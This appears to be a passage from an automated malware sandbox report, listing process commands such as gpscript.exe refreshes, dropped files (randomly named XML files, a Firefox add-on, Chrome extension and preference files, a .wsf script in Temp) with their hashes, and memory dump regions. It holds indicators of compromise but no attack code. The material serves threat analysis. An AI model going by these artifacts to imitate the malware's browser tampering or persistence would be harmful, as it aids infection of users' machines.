C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\EkAcBLsehYBU2\nTMNVQy.xmlFilesize
2KB
MD5018e50b123b4f12f680ff44d1d83aae6
SHA11ac56b926d173de61a2c54bb6e399a24f5b53ce5
SHA2561a9a7166b611e973889dfb8b2994db6b50d52e41566128175ba027515becc1c2
SHA5124542b9d86886e8aed1b58bda7d020db090895e7638d950f538ae554670cdaba82b8279113fd37448eebdf070062a3530cfdf67c625249ad2617158babbb693fd
-
C:\Program Files (x86)\LjPBjCkxU\iXGGmtk.xmlFilesize
2KB
MD55c31e2bfafd9b50dd8cd0704c59929f1
SHA19b984d1f8ebe66b2bcaa02a2dfadfbf6c10f33f2
SHA2560dfbd51179c9a3191851375e97ab266dc51188bf4bc345304abc8afb1382f55b
SHA5124095f4f744e64b91ca1a734864d749c87ea19da8f40ae837a06a86848e3e6d5cc6dc57c0632795e6b8902b12978ac896418b9f5709c8401afb05b7ebab5f9bed
-
C:\Program Files (x86)\WEPOREuymMJJC\EwEvpwW.xmlFilesize
2KB
MD5f3675a4feaea2147c79af7ca2c50e19d
SHA1263fcccf6eb2b0a348d654c7e0a62fb28b844eab
SHA2563cb57e3481f3436140e17d46bdf09f6c6e7147cdb631e26ec6bb17e53b743c14
SHA512e77ef9ec7ae34e12f6b2821f2967bdb88906ddfbadcadc10ae61b1df3553412b8c9cc264138e3d2ee7acd2405c92a8b4e9ca8ff48c5cdf1b074939acd2c5f196
-
C:\Program Files (x86)\wUkIgIyvDvCODvDfVpR\PjAmsXW.xmlFilesize
2KB
MD577a68efef59af0cd82a49e056b6a7b65
SHA134344362d4c52ad5501c4710568a3aca4ef0b532
SHA256d48ecc138ad58de771411deeec3e699ca6af4d23341cd3408758ed8da403766e
SHA512c7fc9c54eb75af8283713fb1859cc4378405e15b3f677fa7bd2aa1270ec28043e4d5377145b39a8dd95e5eb7a64d7e0199c331e4a6694527347338b6ee963949
-
C:\Program Files\Mozilla Firefox\browser\features\{9A9F9ACC-B19C-4B66-8FE8-814016970733}.xpiFilesize
641KB
MD529d64f99db9730d66894cbc55d061585
SHA1eee03dd28dd14b992ceb024f5b03fa7217e839e9
SHA2564b68220a718c6ff298c1e10a45bce8e6e4a870cffb261f641fbe99f64b4568c3
SHA5124fd3dbbca0c02d85b64ad18821d31705a99c0b4095d0f61d4a7a0f460ec273ac362c76e49cbc61080f01c7ff2a3fbc9dfbf347f43818ecc0f6e956cd3c9e733c
-
C:\ProgramData\PtxASTBQXXYOENVB\yoUakDA.xmlFilesize
2KB
MD5cdd92fa2b3f6a5c633eaba393b1aea18
SHA11a921f777be56da2cf4e24d0a0bb397fc77bef4e
SHA256602630e9d1c292da28dd025127728053f134afa930faabf685d7dfb6a75f0c33
SHA5124a4e24fe568c1e4406453a932c3e10e19878fca4157039ee806c7e36583cb0355778c1e74b76047270d45c4f3652617488c21278fa4239918d5648cb7db7ed07
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gimgggabfigedfmidfhmgaaccgefdfnj\1.0_0\_locales\en\messages.jsonFilesize
150B
MD533292c7c04ba45e9630bb3d6c5cabf74
SHA13482eb8038f429ad76340d3b0d6eea6db74e31bd
SHA2569bb88ea0dcd22868737f42a3adbda7bf773b1ea07ee9f4c33d7a32ee1d902249
SHA5122439a27828d05bddec6d9c1ec0e23fc9ebb3df75669b90dbe0f46ca05d996f857e6fbc7c895401fecfae32af59a7d4680f83edca26f8f51ca6c00ef76e591754
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gimgggabfigedfmidfhmgaaccgefdfnj\1.0_0\_locales\pt_BR\messages.jsonFilesize
161B
MD55c5a1426ff0c1128c1c6b8bc20ca29ac
SHA10e3540b647b488225c9967ff97afc66319102ccd
SHA2565e206dd2dad597ac1d7fe5a94ff8a1a75f189d1fe41c8144df44e3093a46b839
SHA5121f61809a42b7f34a3c7d40b28aa4b4979ae94b52211b8f08362c54bbb64752fa1b9cc0c6d69e7dab7e5c49200fb253f0cff59a64d98b23c0b24d7e024cee43c4
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
10KB
MD500b1c932b9f64247e8b49a986efdbdf0
SHA1b56b8f261c503c98c6191c3f481d9acbe5b6cd26
SHA256870a0109b80f9a495278c8df716922f9b5699048cb659bb4ddf3f329f1c3125e
SHA512b7df216f4f441afee1ccc67b1b2c2dfac1137a77aa0f4839ffaf38d5fbe243501e5f7c0cc32e2e82f837479e24cea9fb5f464d062fdd41de2938a6d6557ddebb
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure PreferencesFilesize
26KB
MD51878a90847ee33d30698ba7e293b6913
SHA1229d24847bcffeba89f911f60c40cd3a244a10da
SHA256e98c14ac7c519a04e163a7fcc1bea7a1d6720cfc63885a328842851bbd3abeb4
SHA512fa9155329557a1b7fdc13a048833d52154a2be29b657c29d779edf9cfeedcf369dc1285b9d993f93e0667ce9c05134ec2433e129742cb676df4f8329585f19de
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0X863SD79NJLHH4BTQ1P.tempFilesize
7KB
MD53fab3f4a135ac4deac0585b99d491497
SHA121a8bc89cdd5d22ea44f03b755afda8eaf8cd8f4
SHA25672423871ace0f7ddaed4a721d9fac1e8b22ada8754d4bde36957bbc0972a7270
SHA512499369f6a0f02f839a25347c895b32dc25ad165209f23ac4cfd62f7f20d89e0b4f87a0f8eb38ea6a448503e50b7180822555d8ebb5d72c4464aa95b615bd0599
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD5cd47f5faf7289a9834173341ff3c1b2f
SHA1fe87bb940db2b09e567e2aea00bb428ba3087c08
SHA256425a09a6a77cb67ad56ef8728579e2ffbee9f90e4e3b62dadaca0cc74e8541ee
SHA51285383e973d3e7aea2042aa374a7528144231a72b9c6660c64078b2b3cdf6d5b121badb768d802abca41a1ebdc66c49a8909fa809847fb8bf3539381ae5a39030
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QYSLBUA104CZJ39O5R1I.tempFilesize
7KB
MD554d2420e0bdbba54a5ce5225dc6abe41
SHA1dc4510baa5bc5ac5389e693fc17f42a5036d06bc
SHA256b2c54b929e07f9994f522c267082e0b4cf3b606406aabc2a2cdb05f2a7fa5403
SHA512724ed31c5e7dc04429ecd7511a8a8c3013c60362df670b76cfdfc7142f9bf6e925cb40a882a26d1805f6f0f93fafc90d4371fc7731f0a9519b5e210e4e537c9a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
7KB
MD5a424fc277d460cbc72f2e10504964080
SHA19e23f33e6ba9c048d95955cf6f6769651342843e
SHA2567ae844bc3cab876bfd6015014032a1cc6c5042ba1c771d3ff3b0bf86c2ccc912
SHA5129d53fef5b9436aee5ac0548147fd371ca019e8b3f677beb66b7e737132a2442bc30689f22f54afbc243fb03ef34a634f342df99f9f996ae2f37ea9de7d142f01
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0rowjuc9.default-release\prefs.jsFilesize
6KB
MD538333480ead12c04e12097ad90067d2a
SHA131188944917ba73b5074d10342f5ae19af164727
SHA25617b490bf133b54de3914b39f8f4522315c3e07970995572fcc713928780ab670
SHA5127d33aeb8bb4c6735eb27bb50de6b82cbdb76a978b447a79a2aae63917ba4c2cf611da722126978a27d985908559faedfc72b6c3cbaa32f3d0d591debee9fe8cb
-
C:\Windows\Temp\dkHlCbgnIThowMMU\BJMBtNcw\zjtYbNKrCOnFnEdF.wsfFilesize
9KB
MD5186e95d243a028413ee627e388ec6c32
SHA1c9f3a1193b3eb7464eec5f9d39357cb1e411d1f4
SHA2563df3d90ebcc75468a000d1d3527c4eb65f760efdb65d32ecc910cad9c6f17bee
SHA51209530e4463730a5b6cb8c5f10cd14a1255689d3688fbdcdbb41edea9bf50300a6039d6e9c1e8bb135df8d7e40ddc9f09ffbd6ab59b5977d4ab9b4b47521a6433
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/1548-12-0x0000000001E80000-0x0000000001E88000-memory.dmpFilesize
32KB
-
memory/1548-11-0x000000001B680000-0x000000001B962000-memory.dmpFilesize
2.9MB
-
memory/2644-23-0x0000000002000000-0x0000000002008000-memory.dmpFilesize
32KB
-
memory/2644-22-0x000000001B630000-0x000000001B912000-memory.dmpFilesize
2.9MB
-
memory/2664-87-0x0000000002D30000-0x0000000002D93000-memory.dmpFilesize
396KB
-
memory/2664-51-0x0000000002DB0000-0x0000000002E35000-memory.dmpFilesize
532KB
-
memory/2664-276-0x0000000004A50000-0x0000000004ADA000-memory.dmpFilesize
552KB
-
memory/2664-286-0x00000000055E0000-0x00000000056C3000-memory.dmpFilesize
908KB
-
memory/2664-2-0x0000000010000000-0x00000000105DB000-memory.dmpFilesize
5.9MB
-
memory/2848-39-0x000000001B5D0000-0x000000001B8B2000-memory.dmpFilesize
2.9MB